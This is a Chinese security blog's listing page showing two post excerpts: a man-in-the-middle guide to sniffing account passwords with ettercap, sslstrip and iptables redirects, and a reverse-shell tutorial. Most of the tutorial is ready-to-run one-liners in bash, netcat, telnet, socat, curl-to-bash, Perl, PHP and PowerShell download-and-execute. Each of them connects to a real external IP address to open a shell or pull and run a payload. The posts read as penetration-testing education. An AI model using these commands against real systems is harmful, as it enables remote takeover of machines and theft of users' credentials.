首页
相册
统计
留言
更多
网安工具
CTF工具
关于
Search
1
椭圆曲线加密算法原理(ECC)
5,324 阅读
2
SMBGhost(CVE-2020-0796)漏洞利用
4,302 阅读
3
关于gdb调试
4,065 阅读
4
Arduino使用CubeCell开发板进行LORA无线通信
3,852 阅读
5
Diffie-Hellman密钥协商算法
3,542 阅读
深度学习
技术随笔
应急响应
漏洞复现
流量分析
溯源
入侵检测
Linux
eBPF
服务配置
渗透测试
信息收集
横向攻击
密码学
web安全
CTF
登录
Search
标签搜索
单片机
密码学
Windows
BPF
Python
Linux
Mysql
APP开发
软考
Cobalt Strike
flutter
入侵检测
HSM's Blog
累计撰写
53
篇文章
累计收到
11
条评论
首页
栏目
深度学习
技术随笔
应急响应
漏洞复现
流量分析
溯源
入侵检测
Linux
eBPF
服务配置
渗透测试
信息收集
横向攻击
密码学
web安全
CTF
页面
相册
统计
留言
网安工具
CTF工具
关于
搜索到
2
篇与
的结果
2020-10-07
中间人攻击之获取帐号密码
1. ettercap嗅探HTTP网站帐号密码ettercap是个“神器”,本文重点不在于此,故不去详细介绍。开启路由转发、arpspoof双向欺骗不多赘述,一切就绪之后,另一终端下使用如下命令:sudo ettercap -Tq -i wlo1T代表命令行界面而非GUI显示,q代表不显示数据包内容,i指定监听网卡。2. sslstrip+dns2proxy_hsts嗅探HTTPS网站帐号密码先把工具的链接奉上:sslstrip:Kali下自带;如果是其他Linux版本,使用sudo apt install sslstrip命令安装即可。sslstrip2 :作者因为某些原因删掉了原来的代码,这是我在另一处找到的。(你也可以选择使用sslstrip)dns2proxy_hsts嗅探HTTPS网站的帐号密码的思想就是将HTTPS降成HTTP,之后再嗅探HTTP网站的帐号密码。首先,在attacker本机上进行端口映射(有关iptables的知识可以参考这篇文章 ,本文重点不在于iptables): iptables --flush iptables --flush -t nat iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8888 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53前2条命令是在做清理工作,后2条命令才是进行端口映射。之后到dns2proxy_hsts目录下,执行(如果它依赖的dns库没有安装的话,使用sudo pip install dnspython安装即可):python2 dns2proxy.py
2020年10月07日
1,313 阅读
0 评论
0 点赞
2020-05-19
反弹shell介绍
一、 反弹shell简介反弹shell就是指由被控端(靶机/肉鸡)发起连接请求到主控端(攻击机),主控端需在被控端发起请求前提前进行端口监听,最终产生一个交互的会话过程就叫做反弹shell。反弹shell适用于如下几个场景:局域网内,无法直接连接被控端;目标机器的IP不断改变;由于策略限制,对方机器只能发送请求,无法直接接收请求。以下介绍下几种反弹shell的方式。二、 Bash反弹shellBash:Bash是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令。VPS:nc -lvnp 8333靶机:bash -i >& /dev/tcp/43.138.236.131/8333 0>&1三、 Netcat反弹shellNetcat:NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。VPS:nc -lvnp 8333靶机:nc 43.138.236.131 8333 -e bin/bash四、 Telnet反弹shellTelnet:Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。VPS开启监听:nc -lvpn 8334客户端链接:mknod a p;telnet 43.138.236.131 8334 0<a | /bin/bash 1>a五、 Socat反弹shellSocat:Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。Socat 并不是大多数Linux发行版本会预装的软件,需要手动进行安装yum install -y socat 或 apt-get install socatVPS:socat TCP-LISTEN:8333 –靶机:socat tcp-connect:43.138.236.131:8333 exec:'bash -li',pty,stderr,setsid,sigint,sane六、 Curl反弹shellCurl:Curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具,但按传统,习惯称Curl为下载工具。Curl还包含了用于程序开发的libcurl。步骤:VPS:1、 创建index.html文件echo 'bash -c "bash -i >& /dev/tcp/43.138.236.131/8333 0>&1"' > index.html2、 开启http服务(与创建的文件同目录):python -m SimpleHTTPServer 83323、 开启监听:nc -lvnp 8333靶机:curl http://43.138.236.131:8332|bash七、 Perl反弹shellPerl:Perl一种功能丰富的计算机程序语言,运行在超过100种计算机平台上,适用广泛,从最初是为文本处理而开发的,现在用于各种任务,包括系统管理,Web开发,网络编程,GUI开发等。VPS:nc -lvnp 8333靶机:perl -e 'use Socket;$i="43.138.236.131";$p=8333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'八、 PHP反弹shellPHP:PHP(PHP: Hypertext Preprocessor)即“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。VPS:nc -lvnp 8333靶机:php -r '$sock=fsockopen("43.138.236.131","8333");exec("/bin/sh -i <&3 >&3 2>&3");'十、 Powercat脚本反弹shellPowercat:Powercat是一个powershell函数。脚本下载地址:https://github.com/perlh/powercatVPSVPS上传Powershell脚本后开启http服务(python2版本):python -m SimpleHTTPServer 8332VPS开启端口监听:nc -lvnp 8333靶机靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://43.138.236.131:8332/powercat.ps1‘); powercat -c 43.138.236.131 -p 8333 -e cmd十一、 Nishang脚本反弹shellNishang:Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。脚本下载地址:https://github.com/samratashok/nishangVPS上传nishang脚本后开启web服务:python -m SimpleHTTPServer 9933VPS开启服务端监听:nc -lvnp 10010靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)powershell IEX (New-Object Net.WebClient).DownloadString('http://43.138.236.131:9933/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 43.138.236.131 -port 10010
2020年05月19日
945 阅读
0 评论
1 点赞